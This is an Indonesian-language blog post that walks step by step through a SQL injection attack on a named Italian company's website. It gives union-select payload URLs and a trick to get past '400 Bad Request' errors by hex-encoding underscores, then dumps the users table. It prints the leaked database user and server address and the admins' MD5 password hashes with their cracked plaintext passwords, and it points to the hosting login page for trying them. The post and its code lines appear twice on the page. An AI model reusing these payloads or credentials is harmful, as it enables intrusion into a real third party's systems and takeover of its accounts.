SQL Injection Bypass 400 Bad Request

Assalamualaikum wr. wb.

Kali ini gue mau share sedikit tentang SQL Injection Bypass 400 Bad Request.

Ok langsung saja.

Supaya lebih mudah gunakan addon hackbar

Code:

`https://addons.mozilla.org/en-US/firefox/addon/hackbar/`

Target

Code:

`http://www.cattenaricase.com/contattaci.php?id=230`

1. Tambahkan ' (single quote) dan hasilnya error.

Code:

`Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /web/htdocs/www.cattenaricase.com/home/contattaci.php on line 20`

2. Mencari jumlah kolom

Code:

`http://www.cattenaricase.com/contattaci.php?id=230 order by 22--`

normal

Code:

`http://www.cattenaricase.com/contattaci.php?id=230 order by 23--`

error

berarti jumlah kolomnya ada 22 .

3. Mencari nomor kolom yang bisa di inject

Tambahkan - (minus) sebelum value atau angka dari parameter id.

Code:

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--`

yang bisa di inject adalah kolom nomor 3 dan 6.

4. Tampilkan user,database, dan versi yang sedang digunakan.

Code:

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--`

hasil user():database():version()

Code:

Sql161180@62.149.141.12:Sql161180_2:5.0.92-enterprise-gpl-log

5. Tampilkan tabel

Code:

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()--`

Waduh, kok malah error 400 Bad Request.

wewwwww, jangan menyerah dulu, coba kita otak atik.

6. 400 Bad Request Bypassing

Kita coba dengan mengubah _ (under score) ke versi HEX.

Dan tambahkan % (percent) sebelum 5f.

Code:

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information%5fschema.tables where table_schema=database()--`

Yes, berhasil.

7. Tampilkan semua colom pada table users

Jangan lupa ubah users ke HEX, caranya seperti diatas.

Code:

http://www.cattenaricase.com/contattaci.php?id=-230
 union select 
1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 from information%5fschema.columns where table_name=0x7573657273--

8. Dumping data

Kita ambil kolom username dan password saja.

Code:

http://www.cattenaricase.com/contattaci.php?id=-230
 union select 
1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 from users--

Kok berantakan sih tampilannya, santai aja.

Kita lihat Page source dengan cara Ctrl + U, lalu Ctrl + F dan ketik admin.

Ambil kode diantara tag <strong> dan </strong>

Code:

029ee67de769468bf1596fb3fcef8179:460d4fc1ef85070d13d91ea3a9b37e28 

administrator:2aa10cb9dfefd32470970eef21d64ad5

9. Cracking password

Password diatas masih berbentuk MD5 dan belum langsung dapat digunakan.

Sekarang kiata pergi ke sini

Code:

`http://www.hashkiller.co.uk/md5-decrypter.aspx`

lalu isikan captcha yang sesuai

Dan lihat hasilnya.

Code:

tommaso:piazzaistria
administrator:itsatrap

10. Mencari halaman login

Kita tambahkan /login pada situsnya.

Code:

http://www.cattenaricase.com/login

Loh, kok malah redirect ke

Code:

https://admin.aruba.it/PannelloAdmin/login.aspx

, ikuti aja. Coba login dan kalau berhasil ucapkan Alhamdulillah

Title : SQL Injection Bypass 400 Bad Request
Description : Assalamualaikum wr. wb. Kali ini gue mau share sedikit tentang SQL Injection Bypass 400 Bad Request . Ok langsung saja. Supaya...

Total Pageviews

Arsip Blog

Label

Search

Ads

Gallery

Followers

Recent Post

SQL Injection Bypass 400 Bad Request

Assalamualaikum wr. wb.

Kali ini gue mau share sedikit tentang SQL Injection Bypass 400 Bad Request.

Ok langsung saja.

Supaya lebih mudah gunakan addon hackbar

Code:

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Target

Code:

http://www.cattenaricase.com/contattaci.php?id=230

1. Tambahkan ' (single quote) dan hasilnya error.

Code:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /web/htdocs/www.cattenaricase.com/home/contattaci.php on line 20

2. Mencari jumlah kolom

Code:

http://www.cattenaricase.com/contattaci.php?id=230 order by 22--

normal

Code:

http://www.cattenaricase.com/contattaci.php?id=230 order by 23--

error

berarti jumlah kolomnya ada 22 .

3. Mencari nomor kolom yang bisa di inject

Tambahkan - (minus) sebelum value atau angka dari parameter id.

Code:

http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

yang bisa di inject adalah kolom nomor 3 dan 6.

4. Tampilkan user,database, dan versi yang sedang digunakan.

Code:

http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

hasil user():database():version()

Code:

Sql161180@62.149.141.12:Sql161180_2:5.0.92-enterprise-gpl-log

5. Tampilkan tabel

Code:

http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()--

Waduh, kok malah error 400 Bad Request.

wewwwww, jangan menyerah dulu, coba kita otak atik.

6. 400 Bad Request Bypassing

Kita coba dengan mengubah _ (under score) ke versi HEX.

Dan tambahkan % (percent) sebelum 5f.

Code:

http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information%5fschema.tables where table_schema=database()--

Yes, berhasil.

7. Tampilkan semua colom pada table users

Jangan lupa ubah users ke HEX, caranya seperti diatas.

Code:

http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information%5fschema.columns where table_name=0x7573657273--

8. Dumping data

Kita ambil kolom username dan password saja.

Code:

http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from users--

Kok berantakan sih tampilannya, santai aja.

Kita lihat Page source dengan cara Ctrl + U, lalu Ctrl + F dan ketik admin.

Ambil kode diantara tag <strong> dan </strong>

Code:

029ee67de769468bf1596fb3fcef8179:460d4fc1ef85070d13d91ea3a9b37e28 administrator:2aa10cb9dfefd32470970eef21d64ad5

`https://addons.mozilla.org/en-US/firefox/addon/hackbar/`

`http://www.cattenaricase.com/contattaci.php?id=230`

`Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /web/htdocs/www.cattenaricase.com/home/contattaci.php on line 20`

`http://www.cattenaricase.com/contattaci.php?id=230 order by 22--`

`http://www.cattenaricase.com/contattaci.php?id=230 order by 23--`

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--`

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--`

`Sql161180@62.149.141.12:Sql161180_2:5.0.92-enterprise-gpl-log`

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()--`

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information%5fschema.tables where table_schema=database()--`

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information%5fschema.columns where table_name=0x7573657273--`

`http://www.cattenaricase.com/contattaci.php?id=-230 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from users--`

`029ee67de769468bf1596fb3fcef8179:460d4fc1ef85070d13d91ea3a9b37e28 administrator:2aa10cb9dfefd32470970eef21d64ad5`